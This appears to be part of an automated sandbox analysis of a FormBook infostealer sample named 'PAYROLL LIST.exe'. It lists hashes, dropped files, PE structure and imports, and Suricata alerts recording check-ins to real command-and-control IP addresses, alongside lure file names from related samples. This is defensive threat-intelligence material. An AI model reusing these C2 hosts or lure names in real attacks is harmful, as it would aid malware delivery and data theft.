	http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrm	Get hash	malicious	Unknown	Browse	170.106.97.195
	https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.com	Get hash	malicious	HTMLPhisher	Browse	170.106.97.198
	https://www.cbirc.gov.cn/cn/view/pages/index/index.html	Get hash	malicious	Unknown	Browse	101.32.133.53
	https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com	Get hash	malicious	Unknown	Browse	49.51.77.119
	Isabella County Emergency Management-protected.pdf	Get hash	malicious	HTMLPhisher	Browse	170.106.97.195
	Isabella County Emergency Management-protected.pdf	Get hash	malicious	Unknown	Browse	170.106.97.195
	https://hffa.studycentrecpfc.com/D9ns6.studycentrecpfc.com/bUhZb/	Get hash	malicious	HTMLPhisher	Browse	49.51.77.119
	f5dc5302-022c-8bef-7a8e-e20ea821f59b.eml	Get hash	malicious	HTMLPhisher	Browse	170.106.97.196
MULTIBAND-NEWHOPEUS	file.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	VSP469620.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	PO #2411071822.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	Quotation.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	payments.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
	http://mt6j71.p1keesoulharmony.com/	Get hash	malicious	HTMLPhisher, EvilProxy	Browse	209.74.95.101
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	209.74.77.108

Process:	C:\Windows\SysWOW64\waitfor.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut5312.tmp

Download File

Process:	C:\Users\user\Desktop\PAYROLL LIST.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.994226072844011
Encrypted:	true
SSDEEP:	6144:zyMaFEE9DVZN6r/xVi8gIZ4DOOaOPEoHkN2cyGgE0IC9XnhixWF:zyBn9DV4xVhgIOCZOxHTcevImhgWF
MD5:	180A6EC35B3A9A5404684555AF567F0B
SHA1:	467AB7341AFB357B47D4720A6231DE893AD10E8A
SHA-256:	06413BFCB024E2304F92666D399906AA120590C90C87F8D0F045623870B65C8C
SHA-512:	B4B14A4BD04040561B42DFB7D9C47D013ECC3695B9B568FBEBFD5BCC4141A0A0CA7F661DAD02F7FEE55DD54DF9B6F699F5F705328C25148A9863575581D4B804
Malicious:	false
Reputation:	low
Preview:	u..T0YYVL6HI..JA.U2JW2IZ.8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6.IIID^.[2.^.h.Mt...[0*v8D'.;('a&4\$8Fi8).;A:.07v.y.i$&.$kX?@s2IZL8I4-2P.k(Q.t)..\|%2.P.`,_...e6/.R..v!".`#4Zt:+.I4T3YYVHf.II.K@E....2IZL8I4T.Y[WC7CII.NAEU2JW2IZ.,I4T#YYV82HII.JAUU2JU2I\L8I4T3Y_VH6HIIIJ1AU2HW2IZL8K4..YYFH6XIIIJQEU"JW2IZL(I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYx<S0=IIJ..Q2JG2IZ.<I4D3YYVH6HIIIJAEU.JWRIZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL

C:\Users\user\AppData\Local\Temp\forniciform

Download File

Process:	C:\Users\user\Desktop\PAYROLL LIST.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.994226072844011
Encrypted:	true
SSDEEP:	6144:zyMaFEE9DVZN6r/xVi8gIZ4DOOaOPEoHkN2cyGgE0IC9XnhixWF:zyBn9DV4xVhgIOCZOxHTcevImhgWF
MD5:	180A6EC35B3A9A5404684555AF567F0B
SHA1:	467AB7341AFB357B47D4720A6231DE893AD10E8A
SHA-256:	06413BFCB024E2304F92666D399906AA120590C90C87F8D0F045623870B65C8C
SHA-512:	B4B14A4BD04040561B42DFB7D9C47D013ECC3695B9B568FBEBFD5BCC4141A0A0CA7F661DAD02F7FEE55DD54DF9B6F699F5F705328C25148A9863575581D4B804
Malicious:	false
Reputation:	low
Preview:	u..T0YYVL6HI..JA.U2JW2IZ.8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6.IIID^.[2.^.h.Mt...[0*v8D'.;('a&4\$8Fi8).;A:.07v.y.i$&.$kX?@s2IZL8I4-2P.k(Q.t)..\|%2.P.`,_...e6/.R..v!".`#4Zt:+.I4T3YYVHf.II.K@E....2IZL8I4T.Y[WC7CII.NAEU2JW2IZ.,I4T#YYV82HII.JAUU2JU2I\L8I4T3Y_VH6HIIIJ1AU2HW2IZL8K4..YYFH6XIIIJQEU"JW2IZL(I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYx<S0=IIJ..Q2JG2IZ.<I4D3YYVH6HIIIJAEU.JWRIZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL8I4T3YYVH6HIIIJAEU2JW2IZL

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.1503208335730815
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PAYROLL LIST.exe
File size:	1'214'464 bytes
MD5:	e51f8d1fc9fd9b75c5f7bafe9b666c22
SHA1:	5697c6b82bb5fda6cf6ff82d3c3b8249bca8c692
SHA256:	0383269c133cc3a71a10d4c55ba116a11b24a38223703d79522b397d782a72e2
SHA512:	f200437512332b57c6ca9d50751363d45e34e0d9a412215643ad9f6f40d7a854834a5a424c1b883de23b7c2059553665da7fa6e34e319f923b76d54c8bea0f36
SSDEEP:	24576:Ytb20pkaCqT5TBWgNQ7a6A+f99KgwT4j+GG6A:hVg5tQ7a6A+9vG5
TLSH:	E345D01363DDC360C3B25273BA65BB41AEBF782506A5F56B2FD4093DB820122525EB73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673FC4A0 [Thu Nov 21 23:39:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007EFD40B3878Fh
jmp 00007EFD40B2B7A4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007EFD40B2B92Ah
cmp edi, eax
jc 00007EFD40B2BC8Eh
bt dword ptr [004C0158h], 01h
jnc 00007EFD40B2B929h
rep movsb
jmp 00007EFD40B2BC3Ch
cmp ecx, 00000080h
jc 00007EFD40B2BAF4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007EFD40B2B930h
bt dword ptr [004BA370h], 01h
jc 00007EFD40B2BE00h
bt dword ptr [004C0158h], 00000000h
jnc 00007EFD40B2BACDh
test edi, 00000003h
jne 00007EFD40B2BADEh
test esi, 00000003h
jne 00007EFD40B2BABDh
bt edi, 02h
jnc 00007EFD40B2B92Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007EFD40B2B933h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007EFD40B2B985h
bt esi, 03h
jnc 00007EFD40B2B9D8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5f69c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x124000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x5f69c	0x5f800	1ea943df37ed7279082696b63c465e69	False	0.9326350826243456	data	7.90725733360954	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x124000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xc9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xca148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xca6dc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc410	0x56d71	data			1.000326120265282
RT_GROUP_ICON	0x123184	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1231fc	0x14	data	English	Great Britain	1.15
RT_VERSION	0x123210	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1232ec	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-24T08:28:34.269221+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49790	202.92.5.23	80	TCP
2024-11-24T08:28:51.346122+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49830	13.248.169.48	80	TCP
2024-11-24T08:28:54.094567+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49836	13.248.169.48	80	TCP
2024-11-24T08:28:56.733423+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49843	13.248.169.48	80	TCP
2024-11-24T08:28:59.360886+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49850	13.248.169.48	80	TCP
2024-11-24T08:29:06.321809+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49866	209.74.77.109	80	TCP
2024-11-24T08:29:09.039119+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49874	209.74.77.109	80	TCP
2024-11-24T08:29:11.704290+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49881	209.74.77.109	80	TCP
2024-11-24T08:29:14.380015+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49888	209.74.77.109	80	TCP
2024-11-24T08:29:21.309500+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49904	23.225.160.132	80	TCP
2024-11-24T08:29:24.137477+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49911	23.225.160.132	80	TCP
2024-11-24T08:29:26.778071+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49920	23.225.160.132	80	TCP
2024-11-24T08:29:29.450158+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49927	23.225.160.132	80	TCP
2024-11-24T08:29:36.487361+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49943	46.30.211.38	80	TCP
2024-11-24T08:29:39.145083+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49949	46.30.211.38	80	TCP
2024-11-24T08:29:41.864243+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49955	46.30.211.38	80	TCP
2024-11-24T08:29:44.504947+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49962	46.30.211.38	80	TCP
2024-11-24T08:29:53.725965+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49987	103.224.182.242	80	TCP
